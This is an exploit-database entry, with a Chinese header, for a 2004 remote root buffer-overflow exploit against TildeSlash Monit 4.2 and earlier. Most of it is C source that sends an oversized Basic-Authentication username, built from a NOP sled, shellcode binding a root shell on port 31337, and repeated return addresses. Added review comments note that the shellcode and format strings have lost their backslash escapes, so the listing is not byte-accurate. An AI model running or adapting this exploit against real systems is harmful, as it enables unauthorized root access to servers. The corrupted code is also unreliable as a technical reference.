TildeSlash Monit 1-4 – Authentication Handling Buffer Overflow


漏洞ID 1054482 漏洞类型
发布时间 2004-06-04 更新时间 2004-06-04
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24224
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10581/info

It is reported that TildeSlash Monit is prone to a buffer overflow during authentication handling. This issue arises because the affected application fails to properly bound user-supplied strings when copying them into fixed-size stack-based buffers.

Successful exploitation of this issue allows an attacker to execute arbitrary code as the superuser, facilitating unauthorized access and privilege escalation.

/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
*
* http://www.eos-india.net/poc/305monit.c
* Remote Root Exploit for Monit <= 4.2
* Vulnerability: Buffer overflow in the handling of Basic Authentication information.
* Server authenticates clients through:
* Authentication: Basic Base64Encode[UserName:Password]
* Here we are exploiting the insecure handling of username in Basic Authentication information to return
* control (EIP) to our payload.
*
* Nilanjan De [n2n<at>linuxmail<dot>org] - Abhisek Datta [abhisek<at>front<dot>ru]
*
* 06.04.2004
* http://www.eos-india.net
*/

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define BUFF_SIZE 2048
#define PADDING 40
#define EXP_SIZE (256+4+PADDING)
#define MAX_ARCH 2
/*
 * Target table, indexed by argv[3] in main(). Each entry pairs a label with
 * the value that make_http_request() copies, 4 bytes at a time, into the
 * payload. The list is terminated by a NULL label, which is what show_help()
 * stops on; MAX_ARCH must match the number of real entries (two here).
 * NOTE(review): the initializer omits the braces around each element. This is
 * valid C (brace elision) but draws -Wmissing-braces on GCC/Clang.
 */
struct eos{
char *arch;          /* display name; NULL marks the end of the table */
unsigned long ret;   /* value repeated in the payload by make_http_request() */
} targets[] = {
"Monit-4.2-Gentoo",
0xbf7fef02,
//-------------------------------
"Monit <=4.2 Crash",
0xbadc0ded,
NULL,
0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/

/*
 * Payload string; the authors' per-instruction comments are kept at the right.
 * In this copy of the listing every "\xNN" escape has lost its backslash, so
 * what the compiler sees is plain ASCII text ("x31xc0" ...), not the bytes the
 * comments describe; strlen(shellcode) is therefore far larger than the byte
 * count the 256-byte region in make_http_request() assumes. This text is not
 * a byte-accurate copy of the original.
 */
char shellcode[]=
/* sys_fork() */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x02" // movb $0x2,%al
"xcdx80" // int $0x80
"x38xc3" // cmpl %ebx,%eax
"x74x05" // je 0x5
/* sys_exit() */
"x8dx43x01" // leal 0x1(%ebx),%eax
"xcdx80" // int $0x80
/* setuid(0) */
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"xb0x17" // movb $0x17,%al
"xcdx80" // int $0x80
/* socket() */
"x31xc0" // xorl %eax,%eax
"x89x45x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
"x40" // incl %eax
"x89xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
"x89x45x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
"x40" // incl %eax
"x89x45x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
"x8dx4dx08" // leal 0x8(%ebp),%ecx
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89x45x08" // movl %eax,0x8(%ebp)

/* bind()*/
"x43" // incl %ebx(SYS_BIND = 0x2)
"x66x89x5dx14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
"x66xc7x45x16x7ax69" // movw $0x697a,0x16(%ebp)(port=31337)
"x31xd2" // xorl %edx,%edx
"x89x55x18" // movl %edx,0x18(%ebp)
"x8dx55x14" // leal 0x14(%ebp),%edx
"x89x55x0c" // movl %edx,0xc(%ebp)
"xc6x45x10x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80

/* listen() */
"x40" // incl %eax
"x89x45x0c" // movl %eax,0xc(%ebp)
"x43" // incl %ebx
"x43" // incl %ebx(SYS_LISTEN = 0x4)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80

/* accept() */
"x43" // incl %ebx
"x89x45x0c" // movl %eax,0xc(%ebp)
"x89x45x10" // movl %eax,0x10(%ebp)
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80
"x89xc3" // movl %eax,%ebx

/* dup2() */
"x31xc9" // xorl %ecx,%ecx
"xb0x3f" // movb $0x3f,%al
"xcdx80" // int $0x80
"x41" // incl %ecx
"x80xf9x03" // cmpb $0x3,%cl
"x75xf6" // jne -0xa

/* execve() */
"x31xd2" // xorl %edx,%edx
"x52" // pushl %edx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x2fx2fx62x69" // pushl $0x69622f2f
"x89xe3" // movl %esp,%ebx
"x52" // pushl %edx
"x53" // pushl %ebx
"x89xe1" // movl %esp,%ecx
"xb0x0b" // movb $0xb,%al
"xcdx80"; // int $0x80

/*
 * Print the program banner; when 'opt' is non-zero, also print the usage line
 * and the target table (walked until the NULL label sentinel).
 * pr00gie: argv[0], echoed in the usage line.
 * NOTE(review): the format strings in this copy have lost their '\' escapes
 * ("n" for "\n", "t" for "\t"), so output runs together; they are reproduced
 * unchanged here. "%p" is passed an unsigned long, a format/type mismatch
 * inherited from the original.
 */
void show_help(char *pr00gie, u_short opt) {
    static const char *const banner[] = {
        "==========> THE EYE ON SECURITY RESEARCH GROUP <==========n",
        "Monit <= 4.2 Remote Root Exploitn",
        "n2n[at]linuxmail[dot]org - abhisek[at]front[dot]run",
        "http://www.eos-india.netnn",
    };
    for (size_t k = 0; k < sizeof banner / sizeof banner[0]; k++) {
        printf("%s", banner[k]);
    }
    if (!opt) {
        return;
    }
    printf("[usage]n");
    printf("%s [Remote Host] [Remote Port] [Target]n", pr00gie);
    printf("[Available Targets]n");
    for (int idx = 0; targets[idx].arch != NULL; idx++) {
        printf("%d. - %st - %pn", idx, targets[idx].arch, targets[idx].ret);
    }
}
/* Base 64 code ripped from monit src */
/**
* Base64 encode one byte
*/
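/**
 * Base64 encode one 6-bit value.
 * @param u Value in [0, 63]; anything larger maps to '/' (as the original did)
 * @return The base64 alphabet character for u
 */
static char encode(unsigned char u) {
    static const char alphabet[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    /* Out-of-range values fall through to '/' exactly like the original chain. */
    return u < 64 ? alphabet[u] : '/';
}

/**
 * Base64 encode 'size' bytes of 'src' into a freshly malloc()ed,
 * NUL-terminated string. The caller must free() the result.
 * @param size Number of bytes in src; 0 means "use strlen(src)"
 * @param src  The data to encode (may contain NUL bytes when size != 0)
 * @return encoded string, or NULL if src is NULL, size is negative, or
 *         allocation fails
 */
char *encode_base64(int size, unsigned char *src) {
    if (!src) {
        return NULL;
    }
    if (!size) {
        size = (int)strlen((char *)src);
    }
    if (size < 0) {
        return NULL;   /* a negative length cannot be encoded */
    }
    size_t n = (size_t)size;
    /* Four output chars per three input bytes, rounded up, plus the terminator. */
    size_t cap = ((n + 2) / 3) * 4 + 1;
    char *out = malloc(cap);
    if (!out) {
        return NULL;   /* the original dereferenced a failed malloc() */
    }
    char *p = out;
    for (size_t i = 0; i < n; i += 3) {
        unsigned char b1 = src[i];
        unsigned char b2 = (i + 1 < n) ? src[i + 1] : 0;
        unsigned char b3 = (i + 2 < n) ? src[i + 2] : 0;
        *p++ = encode(b1 >> 2);
        *p++ = encode(((b1 & 0x3) << 4) | (b2 >> 4));
        /* Missing trailing bytes are padded with '='. */
        *p++ = (i + 1 < n) ? encode(((b2 & 0xf) << 2) | (b3 >> 6)) : '=';
        *p++ = (i + 2 < n) ? encode(b3 & 0x3f) : '=';
    }
    *p = '\0';   /* the original never terminated the string it returned */
    return out;
}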


/*
 * Fill 'buff' with the HTTP request that main() sends. The Authorization
 * value is the base64 encoding of an EXP_SIZE-byte block built from the 0x90
 * fill, 'shellcode', the 4 bytes at *magic repeated, and a trailing ":x";
 * 'host' is echoed into the Host header.
 * Ownership: exp_buff and exp_buff_encoded are allocated here and never freed.
 * NOTE(review): 'size' only bounds the memset(); the sprintf() calls are
 * unbounded, and passing 'buff' as both the destination and a "%s" source is
 * undefined behaviour. strlen(shellcode) <= 256 is assumed but not checked,
 * and the result of encode_base64() is not checked for NULL.
 */
void make_http_request(char *buff,int size,char *host,unsigned long *magic) {
char *exp_buff;
char *exp_buff_encoded;
int i;
if (!(exp_buff=(char*)malloc(EXP_SIZE))){
perror("malloc()");
exit(1);
}

memset(exp_buff,0x90,EXP_SIZE);
/* copied so that the string (and its NUL) ends at offset 256 */
strcpy(exp_buff+256-strlen(shellcode),shellcode);
/* only the first 4 bytes of *magic are used, whatever sizeof(unsigned long) is */
for(i=256;i<EXP_SIZE-5;i+=4)
memcpy(exp_buff+i,magic,4);
/* ':' separates the Basic-auth user part from the password "x" */
strcpy(exp_buff+EXP_SIZE-4,":x");
exp_buff_encoded=encode_base64(EXP_SIZE,exp_buff);
memset(buff,0x00,size);
sprintf(buff,"GET / HTTP/1.0rn");
sprintf(buff,"%sHost: %srn",buff,host);
sprintf(buff,"%sAuthorization: Basic %srnrnrn",buff,exp_buff_encoded);

}
/*
 * Entry point: argv[1] host, argv[2] TCP port, argv[3] index into targets[].
 * Resolves the host, connects, sends the request built by make_http_request()
 * once, closes the socket and returns 0. Every error path calls exit(1).
 * NOTE(review): in this copy the printf formats have lost their '\' escapes
 * ("n" for "\n", "t" for "\t"), so output runs together. "%p" is passed an
 * unsigned long (type mismatch), and struct sockaddr_in comes from
 * <netinet/in.h>, which is not included directly.
 */
int main(int argc,char *argv[]) {
char *host;
char *b;                 /* request buffer, BUFF_SIZE bytes, never freed */
int rport;
int sockfd;
struct sockaddr_in sin;  /* never zeroed; only three fields are set below */
struct hostent *h;
unsigned int n;          /* target index; unsigned, so the n<0 test is always false */
unsigned long magic;
if(argc != 4) {
show_help(argv[0],1);
exit(1);
}
host=argv[1];
rport=(atoi(argv[2]));   /* atoi(): no error detection, bad input gives 0 */
n=atoi(argv[3]);         /* a negative int becomes a large unsigned and fails n >= MAX_ARCH */
if((n >= MAX_ARCH)||(n<0)) {
printf("- Invalid targetn");
show_help(argv[0],1);
exit(1);
}
magic=targets[n].ret;
show_help(argv[0],0);
printf("-Using RET %pn",magic);
printf("Resolving %st",host);
h=gethostbyname(host);
if(!h) {
printf("[ERROR]nUnable to resolve: %sn",host);
exit(1);
}
else
printf("[DONE]n");
b=(char*)malloc(BUFF_SIZE);
if(!b) {
perror("malloc");
exit(1);
}
sin.sin_addr=*((struct in_addr*)h->h_addr);  /* first resolved address only */
sin.sin_family=AF_INET;
sin.sin_port=htons((u_short)rport);
if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
perror("socket");
exit(1);
}
printf("Connecting to %s:%dt",host,rport);
if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
printf("[ERROR]nUnable to connect: %s:%dn",host,rport);
perror("connect");
exit(1);
}
else
printf("[DONE]n");
make_http_request(b,BUFF_SIZE,host,&magic);
/* a -1 from send() converts to a value != strlen(b), so it is reported as a failure */
if(send(sockfd,b,strlen(b),0) == strlen(b))
printf("Successfully send exploit stringn");
else
printf("Failed sending exploit stringn");
close(sockfd);
return 0;
}
